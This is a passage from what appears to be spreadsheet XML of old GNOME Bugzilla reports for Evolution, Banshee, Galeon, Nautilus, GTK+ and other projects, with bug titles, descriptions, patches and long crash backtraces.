attr = uid info = (nil)
attr = objectClass info = (nil)
attr = uidNumber info = (nil)
attr = gidNumber info = (nil)
attr = loginShell info = (nil)
attr = homeDirectory info = (nil)
attr = gecos info = (nil)
attr = cn info = 0x806aa40
value = kharish
e_contact_set (0x814f4d8 3 0x8150070)
adding new FN
attr = sn info = 0x806aa5c
attr = mailacceptinggeneralid info = (nil)
attr = mail info = 0x806aa78
e_contact_set (0x814f4d8 7 0x8150070)
attr = mailowner info = (nil)
attr = maildrop info = (nil)
e_contact_set (0x814f4d8 1 0x81517e0)
attr = uid info = (nil)
attr = objectClass info = (nil)
attr
(evolution-data-server:11424): libebookbackend-WARNING **: search returned 0
libecalbackendfile-Message: e-cal-backend-file.c:1192: Starting query (#t)
backend_last_client_gone_cb() called!
Machine Configuration
------------------------------------------------------------------
Red Hat Linux release 9 (Shrike) i386 2.4.20-20.8
evolution1.5-1.5.0.200312121529-0.snap.ximian.6.1
evolution-data-server-0.0.3.0.200312121529-0.snap.ximian.6.1
soup-0.7.10-4
libsoup-1.99.28.0.200310211728-0.snap.ximian.6.1
libsoup2.2-2.1.2.0.200312121529-0.snap.ximian.6.1
libgtkhtml3.1_3-3.1.4.0.200312121529-0.snap.ximian.6.1
libgal21-0.23-1
libgal2.0_3-1.99.8-0.ximian.6.3
libgal2.2_0-2.1.1.0.200312121529-0.snap.ximian.6.1
gtkhtml-1.1.8-5
gtkhtml3.0-3.0.9-0.ximian.6.1
gtkhtml3.1-3.1.4.0.200312121529-0.snap.ximian.6.1
gal-0.23-1
pilot-link-0.11.5-4
gnome-pilot-0.1.71-2
gnome-mime-data-2.2.0-1
gtk+-1.2.10-25
gtk2-2.2.1-4
bonobo-1.0.22-4
libbonoboui-2.4.1-0.ximian.6.1
libbonobo-2.4.2-0.ximian.6.2
libgnomecanvas-2.2.0.2-0.ximian.6.2
ORBit2-2.9.0-0.ximian.6.1</t>
  </si>
  <si>
    <t>EVOLUTION-546351</t>
  </si>
  <si>
    <t>Can't Change Calendar for Entry</t>
  </si>
  <si>
    <t>Please describe the problem:
I've created a calendar entry in a calendar called work.  I want to move to another called Personal (both are local to this machine).  Normally I open the calendar event and select the new calendar.  What happens is that I get 2 popups one saying that evo can't open calendar work and the other that it can't open calendar Personal.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
yes
Other information:
This is evo 2.23.5.  When I close the event-gui I am queried as to whether I should save my changes.  I answer yes but it has no effect.  Finally I can create entries in any of my calendars provided that I select that calendar before I create the item.
This used to work in 2.23.4.</t>
  </si>
  <si>
    <t>TOTEM-145192</t>
  </si>
  <si>
    <t>fixes for totem-pl-parser</t>
  </si>
  <si>
    <t>The attached patch merges the recursive level fixes from rhythmbox along with
extending the API to report whether there was an error parsing the file or
whether it was just unrecognized.
I also cleaned up some duplicate code.</t>
  </si>
  <si>
    <t>EVOLUTION-209862</t>
  </si>
  <si>
    <t>Evolution mailer suggestions...</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.12
Synopsis: Evolution mailer suggestions...
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Just some suggestions for Evolution...
I'm using an IMAP mail account... I've made a shortcut to my IMAP inbox
on my shortcut bar but when Evolution starts up the link points to my
local inbox not the IMAP one... so I have to go through the folders to
my IMAP account type in my password have it retrieve the folders and
then go to my inbox... after this the shortcut to the IMAP inbox
works... it would be very useful to have the shortcut work without
having to go through all of the other steps...
Additionally I'm not sure if there are protocol issues but there are
many times when the mail clients simply sits there trying to accomplish
tasks but failing... right now it's simultaneously trying to send a
message and retrieve a message... it's sat here trying to do that for
five minutes... usually I have to close Evolution and start it up again
for this to work...
This also manifests itself sometimes when Evolution looks for new
headers... I'll read a message and then try to go to the next one... it
will sit there checking for new headers and not download the headers for
the message I'm trying to read... it just sits there...
Thanks for the product and I hope this helps...
Unknown reporter: rainman@owlnet.rice.edu changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>rainman</t>
  </si>
  <si>
    <t>EVOLUTION-213082</t>
  </si>
  <si>
    <t>Non-translated text in Edit search</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Press Search-&gt;Edit... in the message list. This reveals the searches with
english names not localized ones. Sender contains Body contains etc.
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen? 
Additional Information:</t>
  </si>
  <si>
    <t>BANSHEE-334465</t>
  </si>
  <si>
    <t>crash playing a file over daap</t>
  </si>
  <si>
    <t>in  (wrapper managed-to-native) Helix.HxUnmanaged:ClientPlayerOpenURL (intstringstring)
in  (wrapper managed-to-native) Helix.HxUnmanaged:ClientPlayerOpenURL (intstringstring)
in  Helix.HxPlayer:OpenUri (string)
in  Banshee.MediaEngine.Helix.HelixPlayer:Open (Banshee.Base.TrackInfoSystem.Uri)
in  Banshee.PlayerUI:PlayFile (Banshee.Base.TrackInfo)
in  Banshee.PlaylistModel:PlayPath (Gtk.TreePath)
in  Banshee.PlaylistView:PlayPath (Gtk.TreePath)
in  Banshee.PlayerUI:OnPlaylistViewButtonPressEvent (objectGtk.ButtonPressEventArgs)
in  (wrapper delegate-invoke) System.MulticastDelegate:invoke_void_object_ButtonPressEventArgs (objectGtk.ButtonPressEventArgs)
in  Gtk.Widget:ButtonPressEventSignalCallback (intptrintptrintptr)
in  (wrapper native-to-managed) Gtk.Widget:ButtonPressEventSignalCallback (intptrintptrintptr)
in  (wrapper managed-to-native) Gtk.Application:gtk_main ()
in  (wrapper managed-to-native) Gtk.Application:gtk_main ()
in  Gtk.Application:Run ()
in  Banshee.BansheeEntry:Startup (string[])
in  Banshee.BansheeEntry:Main (string[])
in  (wrapper runtime-invoke) System.Object:runtime_invoke_void_string[] (objectintptrintptrintptr)
Native stacktrace:
        banshee(mono_handle_native_sigsegv+0xba) [0x8147fba]
        banshee [0x8117500]
        [0xffffe440]
        /usr/lib/RealPlayer10/plugins/httpfsys.so [0xb380064f]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a447fc]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a4516f]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a2a2e8]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a2a94f]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a2ae16]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a2b18d]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a2bbad]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a2cbaa]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a5b4da]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a57f2a]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a2c4ba]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a2cf7d]
        /usr/lib/RealPlayer10/common/clntcore.so [0xb4a2d1d0]
        /usr/lib/banshee/Banshee.MediaEngine/Helix/libhxclient.so.1.0 [0xb4c9241e]
        /usr/lib/banshee/Banshee.MediaEngine/Helix/libhxclient.so.1.0 [0xb4c9256a]
        /usr/lib/banshee/Banshee.MediaEngine/Helix/libhxclient.so.1.0 [0xb4c9272c]
        /usr/lib/banshee/Banshee.MediaEngine/Helix/libhxclient.so.1.0(ClientPlayerOpenURL+0x2a) [0xb4c9f64e]
        [0xac04b747]
        [0xac04b6ba]
        [0xac04b642]
        [0xac04b230]
        [0xac04af3a]
        [0xac04aed4]
        [0xac04a10a]
        [0xac7a6a9a]
        [0xac7a694c]
        [0xb2d3b539]
        /opt/gnome/lib/libgtk-x11-2.0.so.0 [0xb6e648de]
        /opt/gnome/lib/libgobject-2.0.so.0(g_closure_invoke+0x11d) [0xb6c178bd]
        /opt/gnome/lib/libgobject-2.0.so.0 [0xb6c2823d]
        /opt/gnome/lib/libgobject-2.0.so.0(g_signal_emit_valist+0x68f) [0xb6c2950f]
        /opt/gnome/lib/libgobject-2.0.so.0(g_signal_emit+0x35) [0xb6c29915]
        /opt/gnome/lib/libgtk-x11-2.0.so.0 [0xb6f4f608]
        /opt/gnome/lib/libgtk-x11-2.0.so.0(IA__gtk_propagate_event+0x183) [0xb6e5e2f3]
        /opt/gnome/lib/libgtk-x11-2.0.so.0(IA__gtk_main_do_event+0x317) [0xb6e5f547]
        /opt/gnome/lib/libgdk-x11-2.0.so.0 [0xb6cdb5aa]
        /opt/gnome/lib/libglib-2.0.so.0(g_main_context_dispatch+0x16d) [0xb7f00abd]
        /opt/gnome/lib/libglib-2.0.so.0 [0xb7f03cbf]
        /opt/gnome/lib/libglib-2.0.so.0(g_main_loop_run+0x1a9) [0xb7f04069]
        /opt/gnome/lib/libgtk-x11-2.0.so.0(IA__gtk_main+0xb4) [0xb6e5f9c4]
        [0xacce9a59]
        [0xacce9a18]
        [0xb78be02f]
        [0xb78bd89b]
        [0xb78bd823]
        banshee(mono_runtime_exec_main+0x62) [0x80958a2]
        banshee(mono_runtime_run_main+0x152) [0x80969e2]
        banshee(mono_main+0x1035) [0x805d925]
        banshee [0x805c402]
        /lib/libc.so.6(__libc_start_main+0xdc) [0xb7d7883c]
        banshee [0x805c351]</t>
  </si>
  <si>
    <t>NAUTILUS-41469</t>
  </si>
  <si>
    <t>changing owner/group doesn't handle special flags correctly</t>
  </si>
  <si>
    <t xml:space="preserve">man chown gives some rules for how the SUID and GUID flags are supposed to be
handled when the owner/group are changed. I need to do these right currently
it's just leaving them alone.
------- Additional Comments From darin@bentspoon.com 2000-06-28 15:36:46 ----
Required because this is a security hole I think.
------- Additional Comments From sullivan@eazel.com 2000-07-24 16:03:56 ----
Fixed so that changing owner or group on an executable file clears the SUID and
SGID bits as per explanation in man 2 chown.
------- Additional Comments From eli@eazel.com 2000-10-16 19:39:37 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
</t>
  </si>
  <si>
    <t>LIBGNOMEUI-141362</t>
  </si>
  <si>
    <t>Gtkfilechooser should refresh after creating a new directory</t>
  </si>
  <si>
    <t>1. Open the save dialog from say Epiphany. 
2. Choose Browse for other folders and create a new folder.
3. Enter a name for the new folder.
The new folder disappears from the file/folder list. You have to reload the
current directory by pressing the corresponding button in order to see (and
change to) the newly created directory.</t>
  </si>
  <si>
    <t>GTK+-140722</t>
  </si>
  <si>
    <t>strict aliasing fixes</t>
  </si>
  <si>
    <t>Attached patch fixes most warning of latest gcc (strict aliasing rules
incompatible pointer assignment undefined function). Still remaining warnings:
unused variables potentially undefined value.</t>
  </si>
  <si>
    <t>EVOLUTION-212493</t>
  </si>
  <si>
    <t>automatically filtered outgoing mails are swallowed</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Critical
Version: 0.15
Synopsis: automatically filtered outgoing mails are swallowed
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I have several mail filters for my outgoing mails. When I write a mail
which is then filtered (moved from Sent to another folder) it is
marked as deleted in the Sent folder (striked through) but not shown
in the target folder. Only when I restart Evolution it is displayed in
the target folder.
</t>
  </si>
  <si>
    <t>GNOME-KEYRING-156860</t>
  </si>
  <si>
    <t>Remove hand rolled crypto from gnome-keyring</t>
  </si>
  <si>
    <t>The attached patch adds libpkcs11 support to gnome-keyring.  It also cleans
up some error handling and makes gnome-keyring work properly on Solaris.</t>
  </si>
  <si>
    <t>GTK+-474696</t>
  </si>
  <si>
    <t>ToolbarContent should use GSlice</t>
  </si>
  <si>
    <t>ToolbarContent should use GSlice.</t>
  </si>
  <si>
    <t>GNOME-PANEL-76397</t>
  </si>
  <si>
    <t>Cannot remove or change propertis of a swallowed app</t>
  </si>
  <si>
    <t>There seems to be no way to remove a swallowed app or change its
properties. Pretty crap really ..</t>
  </si>
  <si>
    <t>VTE-403028</t>
  </si>
  <si>
    <t>decset mode 12 = blinking cursor</t>
  </si>
  <si>
    <t>Suggestions on how we handle it?
1. Ignore the app request.
2. Override the user cursor setting.
3. And with the user cursor setting.</t>
  </si>
  <si>
    <t>GALEON-69122</t>
  </si>
  <si>
    <t>Crash in a large download</t>
  </si>
  <si>
    <t xml:space="preserve">Package: galeon
Severity: normal
Version: 1.0
Synopsis: Crash in a large download
Bugzilla-Product: galeon
Bugzilla-Component: general
Description:
With only the download window opened downloading a very large file
(500Mb) the progran has crashed when downloaded about 20%-25% of the
file
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...[New Thread 1024 (LWP 1207)]
[New Thread 2049 (LWP 1217)]
[New Thread 1026 (LWP 1218)]
[New Thread 2051 (LWP 1219)]
[New Thread 3076 (LWP 1221)]
0x407eee29 in __wait4 () from /lib/libc.so.6
#0  0x407eee29 in __wait4 () from /lib/libc.so.6
#1  0x4086b050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x401b38de in waitpid (pid=2243 stat_loc=0xbffff07c options=0)
    at wrapsyscall.c:172
#3  0x40253262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x401b14c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 145238336 esi = 1 ebp = 3221222536 esp = 3221222432 ebx = 1078220136 edx = 1075563680 ecx = 1 eax = 1 trapno = 14 err = 4 eip = 1077826103 cs = 35 __csh = 0 eflags = 2163202 esp_at_signal = 3221222432 ss = 43 __ssh = 0 fpstate = 0xbffff1a0 oldmask = 2147483648 cr2 = 1})
    at signals.c:97
#5  
#6  0x403e5237 in xmlEncodeEntitiesReentrant (doc=0x85f37e8 
    input=0x1 ) at entities.c:602
#7  0x4041f1af in xmlNewProp (node=0x8655a30 name=0x80eb2a0 name 
    value=0x1 ) at tree.c:864
#8  0x40421b44 in xmlSetProp (node=0x8655a30 name=0x80eb2a0 name 
    value=0x1 ) at tree.c:3519
#9  0x080955da in mime_db_save ()
#10 0x0809ec1b in preferences_save ()
#11 0x0809808c in galeon_exit ()
#12 0x080d4ad6 in GDownloadProgressListener::OnStateChange ()
#13 0x40d52567 in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#14 0x40d51a66 in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#15 0x40d517d4 in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#16 0x40c35cee in NSGetModule () from /usr/lib/mozilla/components/libnecko.so
#17 0x40c35869 in NSGetModule () from /usr/lib/mozilla/components/libnecko.so
#18 0x40d513cf in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#19 0x40d513aa in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#20 0x40d51649 in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#21 0x40d50dfe in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#22 0x40d50fad in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#23 0x400d83c8 in nsServiceEntry::~nsServiceEntry () from /usr/lib/libxpcom.so
#24 0x400dadd9 in FreeServiceFactoryEntryEnumerate () from /usr/lib/libxpcom.so
#25 0x400a1fd9 in PL_DHashTableEnumerate () from /usr/lib/libxpcom.so
#26 0x400dae7d in nsComponentManagerImpl::FreeServices ()
   from /usr/lib/libxpcom.so
#27 0x400a1662 in NS_ShutdownXPCOM () from /usr/lib/libxpcom.so
#28 0x4003c911 in NS_TermEmbedding () from /usr/lib/libgtkembedmoz.so
#29 0x40037b22 in EmbedPrivate::PopStartup () from /usr/lib/libgtkembedmoz.so
#30 0x400355a4 in gtk_moz_embed_pop_startup () from /usr/lib/libgtkembedmoz.so
#31 0x08098130 in galeon_exit ()
#32 0x080a59d6 in session_server_stop_timeout ()
#33 0x405d1f10 in g_timeout_dispatch (source_data=0x85b1dc0 
    dispatch_time=0xbffffa60 user_data=0x0) at gmain.c:1302
#34 0x405d1055 in g_main_dispatch (dispatch_time=0xbffffa60) at gmain.c:656
#35 0x405d1659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#36 0x405d17e8 in g_main_run (loop=0x84abc00) at gmain.c:935
#37 0x404e67f7 in gtk_main () at gtkmain.c:524
#38 0x080915ed in main ()
#39 0x40757306 in __libc_start_main (main=0x80913d0  argc=1 
    ubp_av=0xbffffb6c init=0x806effc  fini=0x80e1df0  
    rtld_fini=0x4000d2dc  stack_end=0xbffffb5c)
    at ../sysdeps/generic/libc-start.c:129
Thread 5 (Thread 3076 (LWP 1221)):
#0  0x40769966 in __sigsuspend (set=0xbf3ff90c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401b0d61 in __pthread_wait_for_restart_signal (self=0xbf3ffc00)
    at pthread.c:969
#2  0x401acee4 in pthread_cond_wait (cond=0x8207eac mutex=0x82005c8)
    at restart.h:34
#3  0x4014ed39 in PR_WaitCondVar () from /usr/lib/libnspr4.so
#4  0x400e8b90 in nsThreadPool::GetRequest () from /usr/lib/libxpcom.so
#5  0x400e9295 in nsThreadPoolRunnable::Run () from /usr/lib/libxpcom.so
#6  0x400e7dfb in nsThread::Main () from /usr/lib/libxpcom.so
#7  0x401535a8 in _pt_root () from /usr/lib/libnspr4.so
#8  0x401adf87 in pthread_start_thread (arg=0xbf3ffc00) at manager.c:284
Thread 4 (Thread 2051 (LWP 1219)):
#0  0x40769966 in __sigsuspend (set=0xbf5ff94c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x401b0d61 in __pthread_wait_for_restart_signal (self=0xbf5ffc00)
    at pthread.c:969
#2  0x401acee4 in pthread_cond_wait (cond=0x8226b04 mutex=0x8201220)
    at restart.h:34
#3  0x4014ed39 in PR_WaitCondVar () from /usr/lib/libnspr4.so
#4  0x40c4b969 in NSGetModule () from /usr/lib/mozilla/components/libnecko.so
#5  0x40c4b395 in NSGetModule () from /usr/lib/mozilla/components/libnecko.so
#6  0x400e7dfb in nsThread::Main () from /usr/lib/libxpcom.so
#7  0x401535a8 in _pt_root () from /usr/lib/libnspr4.so
#8  0x401adf87 in pthread_start_thread (arg=0xbf5ffc00) at manager.c:284
Thread 3 (Thread 1026 (LWP 1218)):
#0  0x40819c6c in __poll (fds=0xbf7ff86c nfds=2 timeout=35000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x40152351 in _pr_poll_with_poll () from /usr/lib/libnspr4.so
#2  0x40c40b68 in NSGetModule () from /usr/lib/mozilla/components/libnecko.so
#3  0x400e7dfb in nsThread::Main () from /usr/lib/libxpcom.so
#4  0x401535a8 in _pt_root () from /usr/lib/libnspr4.so
#5  0x401adf87 in pthread_start_thread (arg=0xbf7ffc00) at manager.c:284
Thread 2 (Thread 2049 (LWP 1217)):
#0  0x40819c6c in __poll (fds=0x825d434 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x401add0e in __pthread_manager (arg=0x10) at manager.c:140
Thread 1 (Thread 1024 (LWP 1207)):
#0  0x407eee29 in __wait4 () from /lib/libc.so.6
#1  0x4086b050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x401b38de in waitpid (pid=2243 stat_loc=0xbffff07c options=0)
    at wrapsyscall.c:172
#3  0x40253262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x401b14c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 145238336 esi = 1 ebp = 3221222536 esp = 3221222432 ebx = 1078220136 edx = 1075563680 ecx = 1 eax = 1 trapno = 14 err = 4 eip = 1077826103 cs = 35 __csh = 0 eflags = 2163202 esp_at_signal = 3221222432 ss = 43 __ssh = 0 fpstate = 0xbffff1a0 oldmask = 2147483648 cr2 = 1})
    at signals.c:97
#5  
#6  0x403e5237 in xmlEncodeEntitiesReentrant (doc=0x85f37e8 
    input=0x1 ) at entities.c:602
#7  0x4041f1af in xmlNewProp (node=0x8655a30 name=0x80eb2a0 name 
    value=0x1 ) at tree.c:864
#8  0x40421b44 in xmlSetProp (node=0x8655a30 name=0x80eb2a0 name 
    value=0x1 ) at tree.c:3519
#9  0x080955da in mime_db_save ()
#10 0x0809ec1b in preferences_save ()
#11 0x0809808c in galeon_exit ()
#12 0x080d4ad6 in GDownloadProgressListener::OnStateChange ()
#13 0x40d52567 in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#14 0x40d51a66 in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#15 0x40d517d4 in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#16 0x40c35cee in NSGetModule () from /usr/lib/mozilla/components/libnecko.so
#17 0x40c35869 in NSGetModule () from /usr/lib/mozilla/components/libnecko.so
#18 0x40d513cf in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#19 0x40d513aa in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#20 0x40d51649 in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#21 0x40d50dfe in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#22 0x40d50fad in NSGetModule ()
   from /usr/lib/mozilla/components/liburiloader.so
#23 0x400d83c8 in nsServiceEntry::~nsServiceEntry () from /usr/lib/libxpcom.so
#24 0x400dadd9 in FreeServiceFactoryEntryEnumerate () from /usr/lib/libxpcom.so
#25 0x400a1fd9 in PL_DHashTableEnumerate () from /usr/lib/libxpcom.so
#26 0x400dae7d in nsComponentManagerImpl::FreeServices ()
   from /usr/lib/libxpcom.so
#27 0x400a1662 in NS_ShutdownXPCOM () from /usr/lib/libxpcom.so
#28 0x4003c911 in NS_TermEmbedding () from /usr/lib/libgtkembedmoz.so
#29 0x40037b22 in EmbedPrivate::PopStartup () from /usr/lib/libgtkembedmoz.so
#30 0x400355a4 in gtk_moz_embed_pop_startup () from /usr/lib/libgtkembedmoz.so
#31 0x08098130 in galeon_exit ()
#32 0x080a59d6 in session_server_stop_timeout ()
#33 0x405d1f10 in g_timeout_dispatch (source_data=0x85b1dc0 
    dispatch_time=0xbffffa60 user_data=0x0) at gmain.c:1302
#34 0x405d1055 in g_main_dispatch (dispatch_time=0xbffffa60) at gmain.c:656
#35 0x405d1659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#36 0x405d17e8 in g_main_run (loop=0x84abc00) at gmain.c:935
#37 0x404e67f7 in gtk_main () at gtkmain.c:524
#38 0x080915ed in main ()
#39 0x40757306 in __libc_start_main (main=0x80913d0  argc=1 
    ubp_av=0xbffffb6c init=0x806effc  fini=0x80e1df0  
    rtld_fini=0x4000d2dc  stack_end=0xbffffb5c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x407eee29 in __wait4 () from /lib/libc.so.6
#0  0x407eee29 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4086b050 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x401b38de in waitpid (pid=2243 stat_loc=0xbffff07c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff07c
options = 0
result = 0
oldtype = 0
#3  0x40253262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1075466665
in_segv = 1
pid = 0
#4  0x401b14c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 145238336 esi = 1 ebp = 3221222536 esp = 3221222432 ebx = 1078220136 edx = 1075563680 ecx = 1 eax = 1 trapno = 14 err = 4 eip = 1077826103 cs = 35 __csh = 0 eflags = 2163202 esp_at_signal = 3221222432 ss = 43 __ssh = 0 fpstate = 0xbffff1a0 oldmask = 2147483648 cr2 = 1})
    at signals.c:97
	in signals.c
self = 0x401ba460
in_sighandler = 0x0
self = 0x401ba460
in_sighandler = 0x0
#5  
No locals.
#6  0x403e5237 in xmlEncodeEntitiesReentrant (doc=0x85f37e8 
    input=0x1 ) at entities.c:602
	in entities.c
cur = (xmlChar *) 0x1 
buffer = (xmlChar *) 0x841b3d0 `jB\bX\227\206@
out = (xmlChar *) 0x8a82940 H\225\206@X*\227\b\002
buffer_size = 1000
html = 0
#7  0x4041f1af in xmlNewProp (node=0x8655a30 name=0x80eb2a0 name 
    value=0x1 ) at tree.c:864
	in tree.c
name = (xmlChar *) 0x1 
cur = 0x8a82940
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-01-19 14:12 -------
The original reporter (bisho@onirica.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component yaneti@declera.com.
</t>
  </si>
  <si>
    <t>LIBGDA-144080</t>
  </si>
  <si>
    <t>Make GdaMoney and GdaNumeric into boxed types.</t>
  </si>
  <si>
    <t>This patch makes GdaMoney and GdaNumeric into glib boxed types.</t>
  </si>
  <si>
    <t>SERPENTINE-309521</t>
  </si>
  <si>
    <t>Orphan dialog</t>
  </si>
  <si>
    <t>When serpentine starts and no devices are found the dialog that appears to warn
the user of such thing is not associated with a parent or if it is the main
window is hidden. The title of the dialog is Unnamed Dialog or something.</t>
  </si>
  <si>
    <t>GLIB-708886</t>
  </si>
  <si>
    <t>GSocketControlMessage documentation refers to a 'file description' instead of a 'file descriptor'</t>
  </si>
  <si>
    <t>Created attachment 255893
gio: Fix documentation for GSocketControlMessage that refers to a 'file description' instead of a 'file descriptor'
The GSocketControlMessage documentation refers to a 'file description' instead of a 'file descriptor'. Patch attached.</t>
  </si>
  <si>
    <t>GALEON-73844</t>
  </si>
  <si>
    <t>can go back to a blank page</t>
  </si>
  <si>
    <t>I create a new tab and then go to some url. If I click on Back the tab
will go back to a blank page.
I think there should be some mechanism to avoid going back to a blank page.</t>
  </si>
  <si>
    <t>JHBUILD-375921</t>
  </si>
  <si>
    <t>Make jhbuild run safer</t>
  </si>
  <si>
    <t>$ jhbuild run
Traceback (most recent call last):
    ...
    os.execlp(args[0] *args)
IndexError: list index out of range
and:
$ jhbuild run moo
Traceback (most recent call last):
    ....
    func(fullname *argrest)
OSError: [Errno 2] No such file or directory
There should be code to catch these two expetions. I have created a patch so it now should look like this
$ jhbuild run
jhbuild run: must specify name of command to run
usage: jhbuild [ -f config ] command [ options ... ]
$ jhbuild run moo
jhbuild run: Command 'moo' not found</t>
  </si>
  <si>
    <t>GTK+-111052</t>
  </si>
  <si>
    <t>GtkProgress does not update if the widget is invisible.</t>
  </si>
  <si>
    <t>I have a GtkNotebook with a GtkProgressBar in one of the panes and a button
which indirectly provokes an update to it in another pane.
GTK+ does not update the invisible GtkProgressBar.
Cause:
In gtkprogress.c:
void
gtk_progress_set_format_string (GtkProgress *progress
                                const gchar *format)
{
  g_return_if_fail (GTK_IS_PROGRESS (progress))
  /* Turn on format in case someone called
   * gtk_progress_bar_set_text() and turned it off.
   */
  progress-&gt;use_text_format = TRUE
  if (format)
    {
      if (progress-&gt;format)
        g_free (progress-&gt;format)
      progress-&gt;format = g_strdup (format)
&gt;      if (GTK_WIDGET_DRAWABLE (GTK_WIDGET (progress)))
&gt;        gtk_widget_queue_resize (GTK_WIDGET (progress))
    }
}</t>
  </si>
  <si>
    <t>vasco.costa</t>
  </si>
  <si>
    <t>JHBUILD-337380</t>
  </si>
  <si>
    <t>(librsvg) Package requirements (glib-2.0 &gt;= 2.11.0) were not met</t>
  </si>
  <si>
    <t>when jhbuilding the 2.14 module set
configure: error: Package requirements (glib-2.0 &gt;= 2.11.0) were not met.
Consider adjusting the PKG_CONFIG_PATH environment variable if you
installed software in a non-standard prefix.</t>
  </si>
  <si>
    <t>GSTREAMER-509762</t>
  </si>
  <si>
    <t>missing file in win32/MANIFEST</t>
  </si>
  <si>
    <t>win32/vs6/libgstrtsp.dsp is missing in win32/MANIFEST</t>
  </si>
  <si>
    <t>GEDIT-PLUGINS-374543</t>
  </si>
  <si>
    <t>[PATCH] External Tools: new storage</t>
  </si>
  <si>
    <t>Here is a patch to enable a new storage system in External Tools. Unlike the current one (which is based on a sole XML file) the new one is based on flat files: each script stands in its own file and metadata are contained in a comment block in the script file. In short it looks a bit like nautilus scripts.
Among other things it brings those improvements:
 - ability to provide both system and local (user) tools at the same time
 - ability to write tools using other langages than the default shell
   (there is one in perl in the patch)
 - easy to share tools and get new ones (just copy the file)
 - easy to edit more complex tools (you can edit it in gedit directly)
The old dialog box remains functionnal (currently it can't remove or add new tools anyway) and the store code is ready to allow tools organised in tree (see bug #334967)
Functionnalities yet to code:
 - ability to add/remove tools from the manager
Functionnalities that may appear later in other patches:
 - actual handling of tool tree in the manager and in the menu creator
 - ability to disable tools
 - lockdown handling (especially: unability to save user tools)</t>
  </si>
  <si>
    <t>GSTREAMER-317300</t>
  </si>
  <si>
    <t>inline functions should be static or extern</t>
  </si>
  <si>
    <t>Attaching a patch that makes inline functions that are really static function
defined as static and those that are extern defined as extern.  The forte
compiler does not compile inline functions as inline unless they are defined as
static inline or extern inline.</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-312831</t>
  </si>
  <si>
    <t>crash in camel-folder-thread.c:sort_node when generating message list</t>
  </si>
  <si>
    <t>I have a 791 MB mbox (159 MB compressed) which will crash Evolution every time
it attempts to display the folder. (Obviously I can't attach the mbox to this
bug report for your crashing pleasure and trimming the file doesn't reproduce
the bug. Let me know where you want it and how to put it there and I'll be happy
to give it to you.)
It looks like the assumption being made in sort_node (if we have no message it
must be a dummy node which also means it must have a child just use that as
the sort data (close enough?)) is wrong because it's somehow getting a dummy
node that has no child.
(gdb) frame 0
